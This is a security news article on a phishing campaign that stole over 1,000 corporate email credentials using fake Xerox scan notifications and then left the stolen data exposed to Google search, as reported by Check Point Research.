Fraud Management & Cybercrime , Social Engineering
Hackers Leave Stolen Email Credentials Exposed
Stolen Credentials Stored on Accessible DatabaseHackers waging a phishing campaign stole more than 1,000 corporate email credentials and then stored the stolen data in a database accessible via a simple Google search, Check Point Research says.
The phishing campaign, which began in August 2020, sent emails set up to look like in-office Xerox scan notifications. The threat actors mainly targeted employees at energy and construction companies, but they also hit the retail, finance and education sectors, Check Point says.
The phishing messages contained a malicious HTML attachment that, if opened, launched the credential stealing effort that included running a JavaScript code. This ran in the background of the document and was responsible for simple password checks, sending the data to the attackers’ drop-zone server and redirecting the user to a legitimate Office 365 login page.
The threat actors made the misstep of storing the valuable stolen data in a publicly accessible database, making the credentials accessible to anyone by searching Google, the report adds.
"The Google search engine algorithm naturally indexes the internet," Check Point Research notes. "It was also capable of indexing the hackers’ pages where they temporarily stored the stolen credentials."
The security firm informed Google of the situation, and while the data remains online, victims can use Google search to look for their stolen credentials and then change them, Check Point says.
Attack Techniques
The attackers used compromised email addresses to send the phishing emails in an attempt to make them seem legitimate, the researchers say. The malicious payloads were hosted on compromised WordPress servers to help avoid email security.
"We discovered dozens of compromised WordPress servers that hosted the malicious PHP page (named 'go.php', 'post.php', 'gate.php', 'rent.php' or 'rest.php') and processed all incoming credentials from victims of the phishing attacks," Check Point says.
Pointing to the posting of the stolen data on a publicly accessible database, Saryu Nayyar, CEO of security firm Gurucul, notes: “Attackers are susceptible to the same sort of simple configuration errors that many of them leverage against their targets. But this case also shows that attackers can operate phishing schemes successfully for many months before they're exposed.”
Other Attacks
In recent months, at least two other efforts to steal email credentials were revealed.
In December, Abnormal Security uncovered a spear-phishing campaign that used messages that appear to originate from legitimate companies to target enterprise users in an effort to steal Microsoft Office 365 credentials (see: Recent Spear-Phishing Attacks Originate From Legit Accounts).
And in November, Microsoft's Security Intelligence team warned Office 365 users about another phishing campaign that appeared to be harvesting victims' credentials (see: Microsoft Warns of Office 365 Phishing Attacks).